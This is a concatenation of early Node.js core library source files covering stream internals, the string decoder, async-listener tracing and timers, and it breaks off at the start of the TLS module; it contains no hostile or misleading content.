    src.resume();
  }

  return dest;
};

function pipeOnDrain(src) {
  return function() {
    var state = src._readableState;
    if (state.awaitDrain)
      state.awaitDrain--;
    if (state.awaitDrain === 0 && EE.listenerCount(src, 'data')) {
      state.flowing = true;
      flow(src);
    }
  };
}


Readable.prototype.unpipe = function(dest) {
  var state = this._readableState;

  
  if (state.pipesCount === 0)
    return this;

  
  if (state.pipesCount === 1) {
    
    if (dest && dest !== state.pipes)
      return this;

    if (!dest)
      dest = state.pipes;

    
    state.pipes = null;
    state.pipesCount = 0;
    state.flowing = false;
    if (dest)
      dest.emit('unpipe', this);
    return this;
  }

  

  if (!dest) {
    
    var dests = state.pipes;
    var len = state.pipesCount;
    state.pipes = null;
    state.pipesCount = 0;
    state.flowing = false;

    for (var i = 0; i < len; i++)
      dests[i].emit('unpipe', this);
    return this;
  }

  
  var i = state.pipes.indexOf(dest);
  if (i === -1)
    return this;

  state.pipes.splice(i, 1);
  state.pipesCount -= 1;
  if (state.pipesCount === 1)
    state.pipes = state.pipes[0];

  dest.emit('unpipe', this);

  return this;
};



Readable.prototype.on = function(ev, fn) {
  var res = Stream.prototype.on.call(this, ev, fn);

  
  
  if (ev === 'data' && false !== this._readableState.flowing) {
    this.resume();
  }

  if (ev === 'readable' && this.readable) {
    var state = this._readableState;
    if (!state.readableListening) {
      state.readableListening = true;
      state.emittedReadable = false;
      state.needReadable = true;
      if (!state.reading) {
        var self = this;
        process.nextTick(function() {
          self.read(0);
        });
      } else if (state.length) {
        emitReadable(this, state);
      }
    }
  }

  return res;
};
Readable.prototype.addListener = Readable.prototype.on;



Readable.prototype.resume = function() {
  var state = this._readableState;
  if (!state.flowing) {
    state.flowing = true;
    resume(this, state);
  }
  return this;
};

function resume(stream, state) {
  if (!state.resumeScheduled) {
    state.resumeScheduled = true;
    process.nextTick(function() {
      resume_(stream, state);
    });
  }
}

function resume_(stream, state) {
  if (!state.reading) {
    stream.read(0);
  }

  state.resumeScheduled = false;
  stream.emit('resume');
  flow(stream);
  if (state.flowing && !state.reading)
    stream.read(0);
}

Readable.prototype.pause = function() {
  if (false !== this._readableState.flowing) {
    this._readableState.flowing = false;
    this.emit('pause');
  }
  return this;
};

function flow(stream) {
  var state = stream._readableState;
  if (state.flowing) {
    do {
      var chunk = stream.read();
    } while (null !== chunk && state.flowing);
  }
}




Readable.prototype.wrap = function(stream) {
  var state = this._readableState;
  var paused = false;

  var self = this;
  stream.on('end', function() {
    if (state.decoder && !state.ended) {
      var chunk = state.decoder.end();
      if (chunk && chunk.length)
        self.push(chunk);
    }

    self.push(null);
  });

  stream.on('data', function(chunk) {
    if (state.decoder)
      chunk = state.decoder.write(chunk);

    
    
    if (state.objectMode && (chunk === null || chunk === undefined))
      return;
    else if (!state.objectMode && (!chunk || !chunk.length))
      return;

    var ret = self.push(chunk);
    if (!ret) {
      paused = true;
      stream.pause();
    }
  });

  
  
  for (var i in stream) {
    if (util.isFunction(stream[i]) && util.isUndefined(this[i])) {
      this[i] = function(method) { return function() {
        return stream[method].apply(stream, arguments);
      }}(i);
    }
  }

  
  var events = ['error', 'close', 'destroy', 'pause', 'resume'];
  events.forEach(function(ev) {
    stream.on(ev, self.emit.bind(self, ev));
  });

  
  
  self._read = function(n) {
    if (paused) {
      paused = false;
      stream.resume();
    }
  };

  return self;
};




Readable._fromList = fromList;



function fromList(n, state) {
  var list = state.buffer;
  var length = state.length;
  var stringMode = !!state.decoder;
  var objectMode = !!state.objectMode;
  var ret;

  
  if (list.length === 0)
    return null;

  if (length === 0)
    ret = null;
  else if (objectMode)
    ret = list.shift();
  else if (!n || n >= length) {
    
    if (stringMode)
      ret = list.join('');
    else
      ret = Buffer.concat(list, length);
    list.length = 0;
  } else {
    
    if (n < list[0].length) {
      
      
      var buf = list[0];
      ret = buf.slice(0, n);
      list[0] = buf.slice(n);
    } else if (n === list[0].length) {
      
      ret = list.shift();
    } else {
      
      
      if (stringMode)
        ret = '';
      else
        ret = new Buffer(n);

      var c = 0;
      for (var i = 0, l = list.length; i < l && c < n; i++) {
        var buf = list[0];
        var cpy = Math.min(n - c, buf.length);

        if (stringMode)
          ret += buf.slice(0, cpy);
        else
          buf.copy(ret, c, 0, cpy);

        if (cpy < buf.length)
          list[0] = buf.slice(cpy);
        else
          list.shift();

        c += cpy;
      }
    }
  }

  return ret;
}

function endReadable(stream) {
  var state = stream._readableState;

  
  
  if (state.length > 0)
    throw new Error('endReadable called on non-empty stream');

  if (!state.endEmitted) {
    state.ended = true;
    process.nextTick(function() {
      
      if (!state.endEmitted && state.length === 0) {
        state.endEmitted = true;
        stream.readable = false;
        stream.emit('end');
      }
    });
  }
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

========

































































module.exports = Transform;

var Duplex = require('_stream_duplex');
var util = require('util');
util.inherits(Transform, Duplex);


function TransformState(stream) {
  this.afterTransform = function(er, data) {
    return afterTransform(stream, er, data);
  };

  this.needTransform = false;
  this.transforming = false;
  this.writecb = null;
  this.writechunk = null;
}

function afterTransform(stream, er, data) {
  var ts = stream._transformState;
  ts.transforming = false;

  var cb = ts.writecb;

  if (!cb)
    return stream.emit('error', new Error('no writecb in Transform class'));

  ts.writechunk = null;
  ts.writecb = null;

  if (!util.isNullOrUndefined(data))
    stream.push(data);

  if (cb)
    cb(er);

  var rs = stream._readableState;
  rs.reading = false;
  if (rs.needReadable || rs.length < rs.highWaterMark) {
    stream._read(rs.highWaterMark);
  }
}


function Transform(options) {
  if (!(this instanceof Transform))
    return new Transform(options);

  Duplex.call(this, options);

  this._transformState = new TransformState(this);

  
  var stream = this;

  
  this._readableState.needReadable = true;

  
  
  
  this._readableState.sync = false;

  this.once('prefinish', function() {
    if (util.isFunction(this._flush))
      this._flush(function(er) {
        done(stream, er);
      });
    else
      done(stream);
  });
}

Transform.prototype.push = function(chunk, encoding) {
  this._transformState.needTransform = false;
  return Duplex.prototype.push.call(this, chunk, encoding);
};











Transform.prototype._transform = function(chunk, encoding, cb) {
  throw new Error('not implemented');
};

Transform.prototype._write = function(chunk, encoding, cb) {
  var ts = this._transformState;
  ts.writecb = cb;
  ts.writechunk = chunk;
  ts.writeencoding = encoding;
  if (!ts.transforming) {
    var rs = this._readableState;
    if (ts.needTransform ||
        rs.needReadable ||
        rs.length < rs.highWaterMark)
      this._read(rs.highWaterMark);
  }
};




Transform.prototype._read = function(n) {
  var ts = this._transformState;

  if (!util.isNull(ts.writechunk) && ts.writecb && !ts.transforming) {
    ts.transforming = true;
    this._transform(ts.writechunk, ts.writeencoding, ts.afterTransform);
  } else {
    
    
    ts.needTransform = true;
  }
};


function done(stream, er) {
  if (er)
    return stream.emit('error', er);

  
  
  var ws = stream._writableState;
  var ts = stream._transformState;

  if (ws.length)
    throw new Error('calling transform done when ws.length != 0');

  if (ts.transforming)
    throw new Error('calling transform done when still transforming');

  return stream.push(null);
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

========


























module.exports = PassThrough;

var Transform = require('_stream_transform');
var util = require('util');
util.inherits(PassThrough, Transform);

function PassThrough(options) {
  if (!(this instanceof PassThrough))
    return new PassThrough(options);

  Transform.call(this, options);
}

PassThrough.prototype._transform = function(chunk, encoding, cb) {
  cb(null, chunk);
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

========






















function assertEncoding(encoding) {
  if (encoding && !Buffer.isEncoding(encoding)) {
    throw new Error('Unknown encoding: ' + encoding);
  }
}









var StringDecoder = exports.StringDecoder = function(encoding) {
  this.encoding = (encoding || 'utf8').toLowerCase().replace(/[-_]/, '');
  assertEncoding(encoding);
  switch (this.encoding) {
    case 'utf8':
      
      this.surrogateSize = 3;
      break;
    case 'ucs2':
    case 'utf16le':
      
      this.surrogateSize = 2;
      this.detectIncompleteChar = utf16DetectIncompleteChar;
      break;
    case 'base64':
      
      this.surrogateSize = 3;
      this.detectIncompleteChar = base64DetectIncompleteChar;
      break;
    default:
      this.write = passThroughWrite;
      return;
  }

  
  
  this.charBuffer = new Buffer(6);
  
  this.charReceived = 0;
  
  this.charLength = 0;
};











StringDecoder.prototype.write = function(buffer) {
  var charStr = '';
  
  while (this.charLength) {
    
    var available = (buffer.length >= this.charLength - this.charReceived) ?
        this.charLength - this.charReceived :
        buffer.length;

    
    buffer.copy(this.charBuffer, this.charReceived, 0, available);
    this.charReceived += available;

    if (this.charReceived < this.charLength) {
      
      return '';
    }

    
    buffer = buffer.slice(available, buffer.length);

    
    charStr = this.charBuffer.slice(0, this.charLength).toString(this.encoding);

    
    var charCode = charStr.charCodeAt(charStr.length - 1);
    if (charCode >= 0xD800 && charCode <= 0xDBFF) {
      this.charLength += this.surrogateSize;
      charStr = '';
      continue;
    }
    this.charReceived = this.charLength = 0;

    
    if (buffer.length === 0) {
      return charStr;
    }
    break;
  }

  
  this.detectIncompleteChar(buffer);

  var end = buffer.length;
  if (this.charLength) {
    
    buffer.copy(this.charBuffer, 0, buffer.length - this.charReceived, end);
    end -= this.charReceived;
  }

  charStr += buffer.toString(this.encoding, 0, end);

  var end = charStr.length - 1;
  var charCode = charStr.charCodeAt(end);
  
  if (charCode >= 0xD800 && charCode <= 0xDBFF) {
    var size = this.surrogateSize;
    this.charLength += size;
    this.charReceived += size;
    this.charBuffer.copy(this.charBuffer, size, 0, size);
    buffer.copy(this.charBuffer, 0, 0, size);
    return charStr.substring(0, end);
  }

  
  return charStr;
};





StringDecoder.prototype.detectIncompleteChar = function(buffer) {
  
  var i = (buffer.length >= 3) ? 3 : buffer.length;

  
  
  for (; i > 0; i--) {
    var c = buffer[buffer.length - i];

    

    
    if (i == 1 && c >> 5 == 0x06) {
      this.charLength = 2;
      break;
    }

    
    if (i <= 2 && c >> 4 == 0x0E) {
      this.charLength = 3;
      break;
    }

    
    if (i <= 3 && c >> 3 == 0x1E) {
      this.charLength = 4;
      break;
    }
  }
  this.charReceived = i;
};

StringDecoder.prototype.end = function(buffer) {
  var res = '';
  if (buffer && buffer.length)
    res = this.write(buffer);

  if (this.charReceived) {
    var cr = this.charReceived;
    var buf = this.charBuffer;
    var enc = this.encoding;
    res += buf.slice(0, cr).toString(enc);
  }

  return res;
};

function passThroughWrite(buffer) {
  return buffer.toString(this.encoding);
}

function utf16DetectIncompleteChar(buffer) {
  this.charReceived = buffer.length % 2;
  this.charLength = this.charReceived ? 2 : 0;
}

function base64DetectIncompleteChar(buffer) {
  this.charReceived = buffer.length % 3;
  this.charLength = this.charReceived ? 3 : 0;
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

========
























module.exports = require('util');
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

========






















var EventEmitter = require('events');
var v8binding, process;




exports._nodeInitialization = function nodeInitialization(pobj) {
  process = pobj;
  v8binding = process.binding('v8');

  
  v8.getHeapStatistics = v8binding.getHeapStatistics;

  
  
  process._setupAsyncListener(asyncFlags,
                              runAsyncQueue,
                              loadAsyncQueue,
                              unloadAsyncQueue);

  
  delete exports._nodeInitialization;
};




var v8 = exports.v8 = new EventEmitter();


function emitGC(before, after) {
  v8.emit('gc', before, after);
}


v8.on('newListener', function(name) {
  if (name === 'gc' && EventEmitter.listenerCount(this, name) === 0) {
    v8binding.startGarbageCollectionTracking(emitGC);
  }
});


v8.on('removeListener', function(name) {
  if (name === 'gc' && EventEmitter.listenerCount(this, name) === 0) {
    v8binding.stopGarbageCollectionTracking();
  }
});








var asyncQueue = new Array();



var contextStack = new Array();
var currentContext = undefined;


var alUid = 0;



var asyncFlags = {};


var inAsyncTick = false;



var inErrorTick = false;


var kHasListener = 0;


var HAS_CREATE_AL = 1 << 0;
var HAS_BEFORE_AL = 1 << 1;
var HAS_AFTER_AL = 1 << 2;
var HAS_ERROR_AL = 1 << 3;


exports._errorHandler = errorHandler;




exports._asyncFlags = asyncFlags;
exports._runAsyncQueue = runAsyncQueue;
exports._loadAsyncQueue = loadAsyncQueue;
exports._unloadAsyncQueue = unloadAsyncQueue;


exports.createAsyncListener = createAsyncListener;
exports.addAsyncListener = addAsyncListener;
exports.removeAsyncListener = removeAsyncListener;




function loadContext(ctx) {
  contextStack.push(currentContext);
  currentContext = ctx;

  asyncFlags[kHasListener] = 1;
}

function unloadContext() {
  currentContext = contextStack.pop();

  if (currentContext === undefined && asyncQueue.length === 0)
    asyncFlags[kHasListener] = 0;
}



function runAsyncQueue(context) {
  var queue = new Array();
  var data = new Array();
  var ccQueue, i, queueItem, value;

  context._asyncQueue = queue;
  context._asyncData = data;
  context._asyncFlags = 0;

  inAsyncTick = true;

  
  
  
  if (currentContext) {
    ccQueue = currentContext._asyncQueue;
    context._asyncFlags |= currentContext._asyncFlags;
    for (i = 0; i < ccQueue.length; i++) {
      queueItem = ccQueue[i];
      queue[queue.length] = queueItem;
      if ((queueItem.callback_flags & HAS_CREATE_AL) === 0) {
        data[queueItem.uid] = queueItem.data;
        continue;
      }
      value = queueItem.create(queueItem.data);
      data[queueItem.uid] = (value === undefined) ? queueItem.data : value;
    }
  }

  
  if (asyncQueue) {
    for (i = 0; i < asyncQueue.length; i++) {
      queueItem = asyncQueue[i];
      
      
      if (data[queueItem.uid] !== undefined)
        continue;
      queue[queue.length] = queueItem;
      context._asyncFlags |= queueItem.callback_flags;
      if ((queueItem.callback_flags & HAS_CREATE_AL) === 0) {
        data[queueItem.uid] = queueItem.data;
        continue;
      }
      value = queueItem.create(queueItem.data);
      data[queueItem.uid] = (value === undefined) ? queueItem.data : value;
    }
  }

  inAsyncTick = false;
}



function loadAsyncQueue(context) {
  loadContext(context);

  if ((context._asyncFlags & HAS_BEFORE_AL) === 0)
    return;

  var queue = context._asyncQueue;
  var data = context._asyncData;
  var i, queueItem;

  inAsyncTick = true;
  for (i = 0; i < queue.length; i++) {
    queueItem = queue[i];
    if ((queueItem.callback_flags & HAS_BEFORE_AL) > 0)
      queueItem.before(context, data[queueItem.uid]);
  }
  inAsyncTick = false;
}



function unloadAsyncQueue(context) {
  if ((context._asyncFlags & HAS_AFTER_AL) === 0) {
    unloadContext();
    return;
  }

  var queue = context._asyncQueue;
  var data = context._asyncData;
  var i, queueItem;

  inAsyncTick = true;
  for (i = 0; i < queue.length; i++) {
    queueItem = queue[i];
    if ((queueItem.callback_flags & HAS_AFTER_AL) > 0)
      queueItem.after(context, data[queueItem.uid]);
  }
  inAsyncTick = false;

  unloadContext();
}





function errorHandler(er) {
  if (inErrorTick)
    return false;

  var handled = false;
  var i, queueItem, threw;

  inErrorTick = true;

  
  if (currentContext && (currentContext._asyncFlags & HAS_ERROR_AL) > 0) {
    var queue = currentContext._asyncQueue;
    var data = currentContext._asyncData;
    for (i = 0; i < queue.length; i++) {
      queueItem = queue[i];
      if ((queueItem.callback_flags & HAS_ERROR_AL) === 0)
        continue;
      try {
        threw = true;
        
        
        
        handled = queueItem.error(data[queueItem.uid], er) || handled;
        threw = false;
      } finally {
        
        
        if (threw) {
          process._exiting = true;
          process.emit('exit', 1);
        }
      }
    }
  }

  
  if (asyncQueue) {
    for (i = 0; i < asyncQueue.length; i++) {
      queueItem = asyncQueue[i];
      if ((queueItem.callback_flags & HAS_ERROR_AL) === 0 ||
          (data && data[queueItem.uid] !== undefined))
        continue;
      try {
        threw = true;
        handled = queueItem.error(queueItem.data, er) || handled;
        threw = false;
      } finally {
        
        
        if (threw) {
          process._exiting = true;
          process.emit('exit', 1);
        }
      }
    }
  }

  inErrorTick = false;

  unloadContext();

  
  

  return handled && !inAsyncTick;
}


function AsyncListenerInst(callbacks, data) {
  if (typeof callbacks.create === 'function') {
    this.create = callbacks.create;
    this.callback_flags |= HAS_CREATE_AL;
  }
  if (typeof callbacks.before === 'function') {
    this.before = callbacks.before;
    this.callback_flags |= HAS_BEFORE_AL;
  }
  if (typeof callbacks.after === 'function') {
    this.after = callbacks.after;
    this.callback_flags |= HAS_AFTER_AL;
  }
  if (typeof callbacks.error === 'function') {
    this.error = callbacks.error;
    this.callback_flags |= HAS_ERROR_AL;
  }

  this.uid = ++alUid;
  this.data = data === undefined ? null : data;
}
AsyncListenerInst.prototype.create = undefined;
AsyncListenerInst.prototype.before = undefined;
AsyncListenerInst.prototype.after = undefined;
AsyncListenerInst.prototype.error = undefined;
AsyncListenerInst.prototype.data = undefined;
AsyncListenerInst.prototype.uid = 0;
AsyncListenerInst.prototype.callback_flags = 0;





function createAsyncListener(callbacks, data) {
  if (typeof callbacks !== 'object' || callbacks == null)
    throw new TypeError('callbacks argument must be an object');

  if (callbacks instanceof AsyncListenerInst)
    return callbacks;
  else
    return new AsyncListenerInst(callbacks, data);
}


function addAsyncListener(callbacks, data) {
  
  if (!(callbacks instanceof AsyncListenerInst)) {
    callbacks = createAsyncListener(callbacks, data);
    asyncQueue.push(callbacks);
    asyncFlags[kHasListener] = 1;
    return callbacks;
  }

  var inQueue = false;
  
  for (var i = 0; i < asyncQueue.length; i++) {
    if (callbacks === asyncQueue[i]) {
      inQueue = true;
      break;
    }
  }

  
  if (!inQueue) {
    asyncQueue.push(callbacks);
    asyncFlags[kHasListener] = 1;
  }

  return callbacks;
}




function removeAsyncListener(obj) {
  for (var i = 0; i < asyncQueue.length; i++) {
    if (obj === asyncQueue[i]) {
      asyncQueue.splice(i, 1);
      break;
    }
  }

  if (asyncQueue.length > 0 || currentContext !== undefined)
    asyncFlags[kHasListener] = 1;
  else
    asyncFlags[kHasListener] = 0;
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

========






















var Timer = process.binding('timer_wrap').Timer;
var L = require('_linklist');
var assert = require('assert').ok;

var kOnTimeout = Timer.kOnTimeout | 0;


var TIMEOUT_MAX = 2147483647; 



var tracing = require('tracing');
var asyncFlags = tracing._asyncFlags;
var runAsyncQueue = tracing._runAsyncQueue;
var loadAsyncQueue = tracing._loadAsyncQueue;
var unloadAsyncQueue = tracing._unloadAsyncQueue;


var kHasListener = 0;


delete tracing._asyncFlags;
delete tracing._runAsyncQueue;
delete tracing._loadAsyncQueue;
delete tracing._unloadAsyncQueue;













var lists = {};


Timer.prototype._asyncQueue = undefined;
Timer.prototype._asyncData = undefined;
Timer.prototype._asyncFlags = 0;



function insert(item, msecs) {
  item._idleStart = Timer.now();
  item._idleTimeout = msecs;

  if (msecs < 0) return;

  var list;

  if (lists[msecs]) {
    list = lists[msecs];
  } else {
    list = new Timer();
    list.start(msecs, 0);

    L.init(list);

    lists[msecs] = list;
    list.msecs = msecs;
    list[kOnTimeout] = listOnTimeout;
  }

  L.append(list, item);
  assert(!L.isEmpty(list)); 
}

function listOnTimeout() {
  var msecs = this.msecs;
  var list = this;

  

  var now = Timer.now();
  

  var diff, first, hasQueue, threw;
  while (first = L.peek(list)) {
    diff = now - first._idleStart;
    if (diff < msecs) {
      list.start(msecs - diff, 0);
      
      return;
    } else {
      L.remove(first);
      assert(first !== L.peek(list));

      if (!first._onTimeout) continue;

      
      
      
      
      
      var domain = first.domain;
      if (domain && domain._disposed)
        continue;

      hasQueue = !!first._asyncQueue;

      try {
        if (hasQueue)
          loadAsyncQueue(first);
        if (domain)
          domain.enter();
        threw = true;
        first._onTimeout();
        if (domain)
          domain.exit();
        if (hasQueue)
          unloadAsyncQueue(first);
        threw = false;
      } finally {
        if (threw) {
          
          
          
          var oldDomain = process.domain;
          process.domain = null;
          process.nextTick(function() {
            list[kOnTimeout]();
          });
          process.domain = oldDomain;
        }
      }
    }
  }

  
  assert(L.isEmpty(list));
  list.close();
  delete lists[msecs];
}


var unenroll = exports.unenroll = function(item) {
  L.remove(item);

  var list = lists[item._idleTimeout];
  
  
  if (list && L.isEmpty(list)) {
    
    list.close();
    delete lists[item._idleTimeout];
  }
  
  item._idleTimeout = -1;
};



exports.enroll = function(item, msecs) {
  
  
  if (item._idleNext) unenroll(item);

  
  if (msecs > 0x7fffffff) {
    msecs = 0x7fffffff;
  }

  item._idleTimeout = msecs;
  L.init(item);
};




exports.active = function(item) {
  var msecs = item._idleTimeout;
  if (msecs >= 0) {
    var list = lists[msecs];
    if (!list || L.isEmpty(list)) {
      insert(item, msecs);
    } else {
      item._idleStart = Timer.now();
      L.append(list, item);
    }
  }
  
  
  
  if (asyncFlags[kHasListener] > 0)
    runAsyncQueue(item);
};





exports.setTimeout = function(callback, after) {
  var timer;

  after *= 1; 

  if (!(after >= 1 && after <= TIMEOUT_MAX)) {
    after = 1; 
  }

  timer = new Timeout(after);

  if (arguments.length <= 2) {
    timer._onTimeout = callback;
  } else {
    
    var args = Array.prototype.slice.call(arguments, 2);
    timer._onTimeout = function() {
      callback.apply(timer, args);
    }
  }

  if (process.domain) timer.domain = process.domain;

  exports.active(timer);

  return timer;
};


exports.clearTimeout = function(timer) {
  if (timer && (timer[kOnTimeout] || timer._onTimeout)) {
    timer[kOnTimeout] = timer._onTimeout = null;
    if (timer instanceof Timeout) {
      timer.close(); 
    } else {
      exports.unenroll(timer);
    }
  }
};


exports.setInterval = function(callback, repeat) {
  repeat *= 1; 

  if (!(repeat >= 1 && repeat <= TIMEOUT_MAX)) {
    repeat = 1; 
  }

  var timer = new Timeout(repeat);
  var args = Array.prototype.slice.call(arguments, 2);
  timer._onTimeout = wrapper;
  timer._repeat = true;

  if (process.domain) timer.domain = process.domain;
  exports.active(timer);

  return timer;

  function wrapper() {
    callback.apply(this, args);
    
    if (timer._repeat === false) return;
    
    if (this._handle) {
      this._handle.start(repeat, 0);
    } else {
      timer._idleTimeout = repeat;
      exports.active(timer);
    }
  }
};


exports.clearInterval = function(timer) {
  if (timer && timer._repeat) {
    timer._repeat = false;
    clearTimeout(timer);
  }
};


var Timeout = function(after) {
  this._idleTimeout = after;
  this._idlePrev = this;
  this._idleNext = this;
  this._idleStart = null;
  this._onTimeout = null;
  this._repeat = false;
};

Timeout.prototype.unref = function() {
  if (!this._handle) {
    var now = Timer.now();
    if (!this._idleStart) this._idleStart = now;
    var delay = this._idleStart + this._idleTimeout - now;
    if (delay < 0) delay = 0;
    exports.unenroll(this);
    this._handle = new Timer();
    this._handle[kOnTimeout] = this._onTimeout;
    this._handle.start(delay, 0);
    this._handle.domain = this.domain;
    this._handle.unref();
  } else {
    this._handle.unref();
  }
};

Timeout.prototype.ref = function() {
  if (this._handle)
    this._handle.ref();
};

Timeout.prototype.close = function() {
  this._onTimeout = null;
  if (this._handle) {
    this._handle[kOnTimeout] = null;
    this._handle.close();
  } else {
    exports.unenroll(this);
  }
};


var immediateQueue = {};
L.init(immediateQueue);


function processImmediate() {
  var queue = immediateQueue;
  var domain, hasQueue, immediate;

  immediateQueue = {};
  L.init(immediateQueue);

  while (L.isEmpty(queue) === false) {
    immediate = L.shift(queue);
    hasQueue = !!immediate._asyncQueue;
    domain = immediate.domain;

    if (hasQueue)
      loadAsyncQueue(immediate);
    if (domain)
      domain.enter();

    var threw = true;
    try {
      immediate._onImmediate();
      threw = false;
    } finally {
      if (threw) {
        if (!L.isEmpty(queue)) {
          
          
          while (!L.isEmpty(immediateQueue)) {
            L.append(queue, L.shift(immediateQueue));
          }
          immediateQueue = queue;
          process.nextTick(processImmediate);
        }
      }
    }

    if (domain)
      domain.exit();
    if (hasQueue)
      unloadAsyncQueue(immediate);
  }

  
  
  
  if (L.isEmpty(immediateQueue)) {
    process._needImmediateCallback = false;
  }
}


function Immediate() { }

Immediate.prototype.domain = undefined;
Immediate.prototype._onImmediate = undefined;
Immediate.prototype._asyncQueue = undefined;
Immediate.prototype._asyncData = undefined;
Immediate.prototype._idleNext = undefined;
Immediate.prototype._idlePrev = undefined;
Immediate.prototype._asyncFlags = 0;


exports.setImmediate = function(callback) {
  var immediate = new Immediate();
  var args, index;

  L.init(immediate);

  immediate._onImmediate = callback;

  if (arguments.length > 1) {
    args = [];
    for (index = 1; index < arguments.length; index++)
      args.push(arguments[index]);

    immediate._onImmediate = function() {
      callback.apply(immediate, args);
    };
  }

  if (!process._needImmediateCallback) {
    process._needImmediateCallback = true;
    process._immediateCallback = processImmediate;
  }

  
  if (asyncFlags[kHasListener] > 0)
    runAsyncQueue(immediate);
  if (process.domain)
    immediate.domain = process.domain;

  L.append(immediateQueue, immediate);

  return immediate;
};


exports.clearImmediate = function(immediate) {
  if (!immediate) return;

  immediate._onImmediate = undefined;

  L.remove(immediate);

  if (L.isEmpty(immediateQueue)) {
    process._needImmediateCallback = false;
  }
};





var unrefList, unrefTimer;


function unrefTimeout() {
  var now = Timer.now();

  

  var diff, domain, first, hasQueue, threw;
  while (first = L.peek(unrefList)) {
    diff = now - first._idleStart;

    if (diff < first._idleTimeout) {
      diff = first._idleTimeout - diff;
      unrefTimer.start(diff, 0);
      unrefTimer.when = now + diff;
      
      return;
    }

    L.remove(first);

    domain = first.domain;

    if (!first._onTimeout) continue;
    if (domain && domain._disposed) continue;
    hasQueue = !!first._asyncQueue;

    try {
      if (hasQueue)
        loadAsyncQueue(first);
      if (domain) domain.enter();
      threw = true;
      
      first._onTimeout();
      threw = false;
      if (domain)
        domain.exit();
      if (hasQueue)
        unloadAsyncQueue(first);
    } finally {
      if (threw) process.nextTick(unrefTimeout);
    }
  }

  
  unrefTimer.when = -1;
}


exports._unrefActive = function(item) {
  var msecs = item._idleTimeout;
  if (!msecs || msecs < 0) return;
  assert(msecs >= 0);

  L.remove(item);

  if (!unrefList) {
    
    unrefList = {};
    L.init(unrefList);

    
    unrefTimer = new Timer();
    unrefTimer.unref();
    unrefTimer.when = -1;
    unrefTimer[kOnTimeout] = unrefTimeout;
  }

  var now = Timer.now();
  item._idleStart = now;

  if (L.isEmpty(unrefList)) {
    
    L.append(unrefList, item);

    unrefTimer.start(msecs, 0);
    unrefTimer.when = now + msecs;
    
    return;
  }

  var when = now + msecs;

  

  var cur, them;

  for (cur = unrefList._idlePrev; cur != unrefList; cur = cur._idlePrev) {
    them = cur._idleStart + cur._idleTimeout;

    if (when < them) {
      

      L.append(cur, item);

      if (unrefTimer.when > when) {
        
        unrefTimer.start(msecs, 0);
        unrefTimer.when = when;
      }

      return;
    }
  }

  
  L.append(unrefList, item);
};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

========






















var net = require('net');
var url = require('url');
var util = require('util');





exports.CLIENT_RENEG_LIMIT = 3;
exports.CLIENT_RENEG_WINDOW = 600;

exports.SLAB_BUFFER_SIZE = 10 * 1024 * 1024;

exports.DEFAULT_CIPHERS =
    
    'ECDHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA256:AES128-GCM-SHA256:' +
    
    'RC4:HIGH:!MD5:!aNULL';

exports.DEFAULT_ECDH_CURVE = 'prime256v1';

exports.getCiphers = function() {
  var names = process.binding('crypto').getSSLCiphers();
  
  var ctx = {};
  names.forEach(function(name) {
